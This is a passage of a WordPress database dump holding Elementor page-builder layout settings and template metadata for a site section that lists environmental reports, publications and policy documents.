\\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(28347,4084,'_elementor_pro_version','3.3.6'),(28348,4085,'_elementor_edit_mode','builder'),(28349,4085,'_elementor_template_type','wp-page'),(28350,4085,'_elementor_version','3.4.0'),(28351,4085,'_wp_page_template','default'),(28352,4085,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(38600,3834,'_elementor_css','a:6:{s:4:\"time\";i:1770859410;s:5:\"fonts\";a:1:{i:0;s:6:\"Roboto\";}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:24:{i:0;s:7:\"ec82dac\";i:1;s:7:\"ec82dac\";i:2;s:7:\"766d5fb\";i:3;s:7:\"766d5fb\";i:4;s:7:\"fce80b4\";i:5;s:7:\"fce80b4\";i:6;s:7:\"ec82dac\";i:7;s:7:\"ec82dac\";i:8;s:7:\"766d5fb\";i:9;s:7:\"766d5fb\";i:10;s:7:\"fce80b4\";i:11;s:7:\"fce80b4\";i:12;s:7:\"ec82dac\";i:13;s:7:\"ec82dac\";i:14;s:7:\"766d5fb\";i:15;s:7:\"766d5fb\";i:16;s:7:\"fce80b4\";i:17;s:7:\"fce80b4\";i:18;s:7:\"ec82dac\";i:19;s:7:\"ec82dac\";i:20;s:7:\"766d5fb\";i:21;s:7:\"766d5fb\";i:22;s:7:\"fce80b4\";i:23;s:7:\"fce80b4\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(28354,4085,'_elementor_pro_version','3.3.6'),(28355,4086,'_elementor_edit_mode','builder'),(28356,4086,'_elementor_template_type','wp-page'),(28357,4086,'_elementor_version','3.4.0'),(28358,4086,'_wp_page_template','default'),(28359,4086,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(28361,4086,'_elementor_pro_version','3.3.6'),(28368,4088,'_elementor_edit_mode','builder'),(28369,4088,'_elementor_template_type','single-post'),(28370,4088,'_elementor_version','3.4.0'),(28371,4088,'_elementor_pro_version','3.3.6'),(28372,4088,'_edit_lock','1629302032:43'),(28373,4088,'_wp_page_template','default'),(28374,4088,'_elementor_data','[{\"id\":\"15019d2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"661b180\"}],\"layout\":\"full_width\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"ac9681b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"eb8dae8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1be2146\"}]},\"elements\":[{\"id\":\"38b0e91\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"3a01213\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"cbcaacd\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"},\"align\":\"left\",\"image_border_border\":\"solid\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_color\":\"#0A3C11\"},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"8f2b769\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"0fe64ca\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Date Modified:\",\"link\":\"\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"fas fa-eye\",\"library\":\"fa-solid\"},\"_id\":\"72daeb5\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"custom\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"cd45f24\\\" name=\\\"shortcode\\\" settings=\\\"%7B%22shortcode%22%3A%22%5Bpost-views%5D%22%7D\\\"]\"}}],\"text_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"text_color\":\"#979797\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"},{\"id\":\"475d6d1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"209d32b\"}]},\"elements\":[{\"id\":\"f921e53\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c4bbd21\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5cd308b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ec5bf6e\"}]},\"elements\":[{\"id\":\"b1ef2a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"44907c3\",\"elType\":\"widget\",\"settings\":{\"show_label\":\"\",\"prev_label\":\"Previous\",\"next_label\":\"Next\",\"text_color\":\"#0A3C11\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-navigation\"}],\"isInner\":false}],\"isInner\":false}]'),(28376,4088,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/related_topic\";s:10:\"preview_id\";s:3:\"473\";}'),(28377,4091,'_elementor_edit_mode','builder'),(28378,4091,'_elementor_template_type','single-post'),(28379,4091,'_elementor_version','3.4.0'),(28380,4091,'_elementor_pro_version','3.3.6'),(28381,4091,'_wp_page_template','default'),(28382,4091,'_elementor_data','[{\"id\":\"15019d2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"661b180\"}]},\"elements\":[{\"id\":\"ac9681b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"eb8dae8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1be2146\"}]},\"elements\":[{\"id\":\"38b0e91\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"3a01213\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"cbcaacd\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"8f2b769\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"0fe64ca\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Date Modified:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"72daeb5\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"cd45f24\\\" name=\\\"shortcode\\\" settings=\\\"%7B%22shortcode%22%3A%22%5Bpost-views%5D%22%7D\\\"]\"}}]},\"elements\":[],\"widgetType\":\"post-info\"},{\"id\":\"475d6d1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"209d32b\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"f921e53\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true},{\"id\":\"5fffd70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(28384,4091,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/related_topic\";s:10:\"preview_id\";s:3:\"473\";}'),(28385,4092,'_elementor_edit_mode','builder'),(28386,4092,'_elementor_template_type','single-post'),(28387,4092,'_elementor_version','3.4.0'),(28388,4092,'_elementor_pro_version','3.3.6'),(28389,4092,'_wp_page_template','default'),(28390,4092,'_elementor_data','[{\"id\":\"15019d2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"661b180\"}],\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"ac9681b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"eb8dae8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1be2146\"}]},\"elements\":[{\"id\":\"38b0e91\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"3a01213\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"cbcaacd\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"8f2b769\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"0fe64ca\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Date Modified:\",\"link\":\"\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"fas fa-eye\",\"library\":\"fa-solid\"},\"_id\":\"72daeb5\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"custom\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"cd45f24\\\" name=\\\"shortcode\\\" settings=\\\"%7B%22shortcode%22%3A%22%5Bpost-views%5D%22%7D\\\"]\"}}],\"text_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"text_color\":\"#979797\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"},{\"id\":\"475d6d1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"209d32b\"}]},\"elements\":[{\"id\":\"f921e53\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c4bbd21\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5cd308b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ec5bf6e\"}]},\"elements\":[{\"id\":\"b1ef2a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"44907c3\",\"elType\":\"widget\",\"settings\":{\"show_label\":\"\",\"prev_label\":\"Previous\",\"next_label\":\"Next\",\"text_color\":\"#0A3C11\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-navigation\"}],\"isInner\":false}],\"isInner\":false}]'),(28392,4092,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/related_topic\";s:10:\"preview_id\";s:3:\"473\";}'),(28394,4088,'_elementor_conditions','a:2:{i:0;s:30:\"include/singular/related_topic\";i:1;s:29:\"include/singular/mea_resource\";}'),(28397,4093,'_elementor_edit_mode','builder'),(28398,4093,'_elementor_template_type','single-post'),(28399,4093,'_elementor_version','3.4.0'),(28400,4093,'_elementor_pro_version','3.3.6'),(28401,4093,'_wp_page_template','default'),(28402,4093,'_elementor_data','[{\"id\":\"15019d2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"661b180\"}],\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"ac9681b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"eb8dae8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1be2146\"}]},\"elements\":[{\"id\":\"38b0e91\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"3a01213\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"cbcaacd\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"},\"align\":\"left\",\"image_border_border\":\"solid\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_color\":\"#0A3C11\"},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"8f2b769\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"0fe64ca\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Date Modified:\",\"link\":\"\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"fas fa-eye\",\"library\":\"fa-solid\"},\"_id\":\"72daeb5\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"custom\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"cd45f24\\\" name=\\\"shortcode\\\" 